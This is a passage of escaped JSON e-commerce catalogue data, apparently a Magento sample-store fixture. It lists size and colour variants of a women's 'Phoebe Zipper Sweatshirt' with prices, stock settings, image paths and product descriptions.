Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"phoebe-zipper-sweatshirt-xs-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh07-gray_alt1.jpg,\\/w\\/h\\/wh07-gray_back.jpg\",\"image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh07-gray_alt1.jpg,\\/w\\/h\\/wh07-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Gray\"},\"1069\":{\"sku\":\"WH07-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Phoebe Zipper Sweatshirt-XS-Purple\",\"description\":\"<p>A sophisticated layer of warmth awaits you in our full-zip sweatshirt jacket. You\'ll reach for this one in any season to enjoy its sturdy exterior and plush interior.<\\/p>\\n<p>&bull; Gray full zip hoodie with yellow detail.<br \\/>&bull; Hand-warmer pockets. <br \\/>&bull; Zip MP3 pocket with outlet for earphones wire. <br \\/>&bull; Polyester\\/cotton. <br \\/>&bull; Washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"phoebe-zipper-sweatshirt-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1070\":{\"sku\":\"WH07-XS-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Phoebe Zipper Sweatshirt-XS-White\",\"description\":\"<p>A sophisticated layer of warmth awaits you in our full-zip sweatshirt jacket. You\'ll reach for this one in any season to enjoy its sturdy exterior and plush interior.<\\/p>\\n<p>&bull; Gray full zip hoodie with yellow detail.<br \\/>&bull; Hand-warmer pockets. <br \\/>&bull; Zip MP3 pocket with outlet for earphones wire. <br \\/>&bull; Polyester\\/cotton. <br \\/>&bull; Washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"phoebe-zipper-sweatshirt-xs-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"White\"},\"1071\":{\"sku\":\"WH07-S-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Phoebe Zipper Sweatshirt-S-Gray\",\"description\":\"<p>A sophisticated layer of warmth awaits you in our full-zip sweatshirt jacket. You\'ll reach for this one in any season to enjoy its sturdy exterior and plush interior.<\\/p>\\n<p>&bull; Gray full zip hoodie with yellow detail.<br \\/>&bull; Hand-warmer pockets. <br \\/>&bull; Zip MP3 pocket with outlet for earphones wire. <br \\/>&bull; Polyester\\/cotton. <br \\/>&bull; Washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"phoebe-zipper-sweatshirt-s-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh07-gray_alt1.jpg,\\/w\\/h\\/wh07-gray_back.jpg\",\"image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh07-gray_alt1.jpg,\\/w\\/h\\/wh07-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Gray\"},\"1072\":{\"sku\":\"WH07-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Phoebe Zipper Sweatshirt-S-Purple\",\"description\":\"<p>A sophisticated layer of warmth awaits you in our full-zip sweatshirt jacket. You\'ll reach for this one in any season to enjoy its sturdy exterior and plush interior.<\\/p>\\n<p>&bull; Gray full zip hoodie with yellow detail.<br \\/>&bull; Hand-warmer pockets. <br \\/>&bull; Zip MP3 pocket with outlet for earphones wire. <br \\/>&bull; Polyester\\/cotton. <br \\/>&bull; Washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"phoebe-zipper-sweatshirt-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1073\":{\"sku\":\"WH07-S-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Phoebe Zipper Sweatshirt-S-White\",\"description\":\"<p>A sophisticated layer of warmth awaits you in our full-zip sweatshirt jacket. You\'ll reach for this one in any season to enjoy its sturdy exterior and plush interior.<\\/p>\\n<p>&bull; Gray full zip hoodie with yellow detail.<br \\/>&bull; Hand-warmer pockets. <br \\/>&bull; Zip MP3 pocket with outlet for earphones wire. <br \\/>&bull; Polyester\\/cotton. <br \\/>&bull; Washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"phoebe-zipper-sweatshirt-s-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"White\"},\"1074\":{\"sku\":\"WH07-M-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Phoebe Zipper Sweatshirt-M-Gray\",\"description\":\"<p>A sophisticated layer of warmth awaits you in our full-zip sweatshirt jacket. You\'ll reach for this one in any season to enjoy its sturdy exterior and plush interior.<\\/p>\\n<p>&bull; Gray full zip hoodie with yellow detail.<br \\/>&bull; Hand-warmer pockets. <br \\/>&bull; Zip MP3 pocket with outlet for earphones wire. <br \\/>&bull; Polyester\\/cotton. <br \\/>&bull; Washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"phoebe-zipper-sweatshirt-m-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh07-gray_alt1.jpg,\\/w\\/h\\/wh07-gray_back.jpg\",\"image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh07-gray_alt1.jpg,\\/w\\/h\\/wh07-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Gray\"},\"1075\":{\"sku\":\"WH07-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Phoebe Zipper Sweatshirt-M-Purple\",\"description\":\"<p>A sophisticated layer of warmth awaits you in our full-zip sweatshirt jacket. You\'ll reach for this one in any season to enjoy its sturdy exterior and plush interior.<\\/p>\\n<p>&bull; Gray full zip hoodie with yellow detail.<br \\/>&bull; Hand-warmer pockets. <br \\/>&bull; Zip MP3 pocket with outlet for earphones wire. <br \\/>&bull; Polyester\\/cotton. <br \\/>&bull; Washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"phoebe-zipper-sweatshirt-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1076\":{\"sku\":\"WH07-M-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Phoebe Zipper Sweatshirt-M-White\",\"description\":\"<p>A sophisticated layer of warmth awaits you in our full-zip sweatshirt jacket. You\'ll reach for this one in any season to enjoy its sturdy exterior and plush interior.<\\/p>\\n<p>&bull; Gray full zip hoodie with yellow detail.<br \\/>&bull; Hand-warmer pockets. <br \\/>&bull; Zip MP3 pocket with outlet for earphones wire. <br \\/>&bull; Polyester\\/cotton. <br \\/>&bull; Washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"phoebe-zipper-sweatshirt-m-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"image_label\":n